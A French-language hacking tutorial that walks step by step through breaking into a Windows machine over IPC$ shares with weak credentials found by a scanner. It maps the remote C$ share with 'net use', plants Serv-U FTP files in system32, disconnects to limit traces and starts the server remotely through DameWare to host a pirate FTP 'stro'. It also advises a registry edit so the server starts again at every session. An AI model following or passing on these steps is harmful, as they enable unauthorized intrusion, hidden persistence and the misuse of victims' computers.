- Exemple de Hack sur une ipc - |
|
Remarque : Bien lire jusqu'au bout avant de commencer. Ipc trouvé avec ipcscanner (c'est un exemple fictif) : 192.168.0.1 Found: comuser/comuser 1. On ouvre une fenêtre DOS en local. 2. On tape la commande : net use * \\192.168.0.1\c$\winnt\system32 * /user:comuser La première * signifie qu'il attribuera le première lettre disponible comme nom de lecteur On peut seulement mettre \\192.168.0.1\c$ si on veut que le nouveau lecteur nous mène sur le c:\ de la machine distante (ici on atterrira directement dans le répertoire system32\) 3. Il vous demande alors le pass ('comuser' dans notre cas, ne rien mettre si le pass est '[null]'). Si le pass est correct, il vous affiche que cela s'est terminé correctement. C:\>net use * \\192.168.0.1\c$\winnt\system32 * /user:comuser 4. Pour vérifier que ça marche, vous pouvez faire un 'net use' pour voir le résultat : OK F: \\192.168.0.1\c$\winnt\system32 5. Maintenant que vous avez accès au pc distant, allez sur F: (ou la lettre qui correspond chez vous). Dans mon cas, je me trouve alors directement dans le répertoire system32\ de l'autre pc. Je crée alors un répertoire où je pourrais uploader mon Serv-U. Je tape donc la commande mkdir cmd pour qu'il crée un répertoire 'cmd' (vous donnez le nom que vous voulez). 6. Vous allez alors dans ce répertoire (cd cmd), vous allez ensuite sur le disque où se trouve les fichiers Serv-U (personnellement, ils sont dans C:\servu\, pour plus de détails sur ces fichiers, cf. plus bas). Vous utilisez alors la commande xcopy pour copier les fichiers sur le pc distant dans le répertoire cmd. Voici ce que ça peut donner : F:\>mkdir cmd 7. Les fichiers sont alors copiés. Vous créez ensuite un second répertoire où serontstockés les fichiers du futur stro (par exemple 'C:\>winnt\system32\cmd\stro\', ou 'C:\>winnt\system32\dtc\'). 8. Il vous faut maintenant vous déconnecter de la machine distante pour éviter de laisser trop de traces, pour cela vous tapez la commande net use f: /delete. Vous pouvez vérifier que vous n'avez plus aucun lien avec l'ip distante en utilisant la commande net use. 9. Maintenant, ouvrez DameWare, et utilisez la fonction 'Remote Command' -> RCmd Console. Une fois que vous avez entré les login/pass et que vous avez installé le module DameWare sur la machine distante, vous vous trouvez alors sous C:\>. Allez alors dans le répertoire où se trouve Serv-U (cd winnt\system32\cmd). Maintenant, lancez Serv-U en tapant la commande servudaemon.exe (le '.exe' est très important). Et voilà, votre FTP est lancé !!! :D |
Les fichiers Serv-U :ServUDaemon.exeVoici un exemple de fichier ServUDaemon.ini avec quelques commentaires : [GLOBAL]Notez qu'il est important d'adapter le HomeDir de chaque compte en fonction du répertoire que vous avez créé pour stocker les fichiers du stro. Virez également la variable SessionTimeOut. Pour configurer les mots de passe, il n'y a malheureusement pas d'autre solution que d'installer Serv-U chez vous, de créer vos comptes utilisateurs avec les pass et les récupérer cryptés dans ce fichier .ini. Toute cette partie de configuration peut se faire via l'interface Admin de Serv-U mais j'avoue avoir une préférence pour la configuration à la main :D. A tout cela, je pense qu'il faut ajouter une modification de la base de registre pour pouvoir mettre Serv-U en auto-start pour qu'il redémarre à chaque session. |